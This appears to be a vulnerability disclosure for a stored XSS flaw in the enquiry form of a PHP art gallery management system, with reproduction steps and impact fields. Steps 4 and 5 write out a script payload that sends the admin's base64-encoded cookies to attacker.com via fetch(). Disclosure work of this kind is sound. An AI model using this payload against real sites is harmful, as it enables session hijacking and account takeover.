Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
> [Suggested description]
> A stored cross-site scripting (XSS) vulnerability in Art Gallery
> Management System Project v1.0 allows attackers to execute arbitrary
> web scripts or HTML via a crafted payload injected into the message
> parameter on the enquiry page.
>
> ------------------------------------------
>
> [Additional Information]
> Steps-To-Reproduce:
> > Step 1:\tGo to the Project Home page http://localhost/Art-Gallery-MS-PHP/index.php
> > Step 2:\twhile scrolling the home page we see enquiry option of the product in the New Arrivals.
> > Step 3:\tNow click on the enquiry option of any product then we redirected to the Enquiry page.
> \t \tURL: http://127.0.0.1/Art-Gallery-MS-PHP/art-enquiry.php?eid=2
> > Step 4:\tNow fill out the Enquiry form and put the payload in the message field.
> \t\tPayload: test<script>fetch("http://attacker.com/?cookie=" + btoa(document.cookie));</script>
> > Step 5:\tmessage : test<script>fetch("http://attacker.com/?cookie=" + btoa(document.cookie));</script>
> > Step 6:\tNow click on the send button.
> > Step 7:\tNow when the admin logs in to the admin panel or checks the Unanswer Enquiry the XSS payload is executed and the attacker gets the admin cookie.
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> https://phpgurukul.com/
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Art Gallery Management System Project in PHP - 1.0
>
> ------------------------------------------
>
> [Affected Component]
> /Art-Gallery-MS-PHP/art-enquiry.php?eid=2
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Escalation of Privileges]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> Cross-Site Scripting (XSS) is a type of cyber attack that allows an attacker to inject malicious code into a website. When a victim visits the compromised website, the injected code is executed by the victim's web browser, allowing the attacker to steal sensitive information such as login credentials, steal cookies, or perform other malicious actions.
>
> Stored XSS is a type of XSS that involves injecting malicious code into a website's persistent storage, such as a database, which is then served to users when they access the website.
>
> Form-based Cross-Site Scripting (XSS) attacks can have serious consequences for both individuals and organizations. By injecting malicious code into a website through a form field, an attacker can potentially steal sensitive information, and an admin cookie, redirect victims to malicious websites, execute unauthorized actions on behalf of the victim, and even inject additional malicious code into the website to continue executing malicious actions.
>
> ------------------------------------------
>
> [Reference]
> https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/
> https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
>
> ------------------------------------------
>
> [Discoverer]
> Yogesh Verma
Use CVE-2023-23158.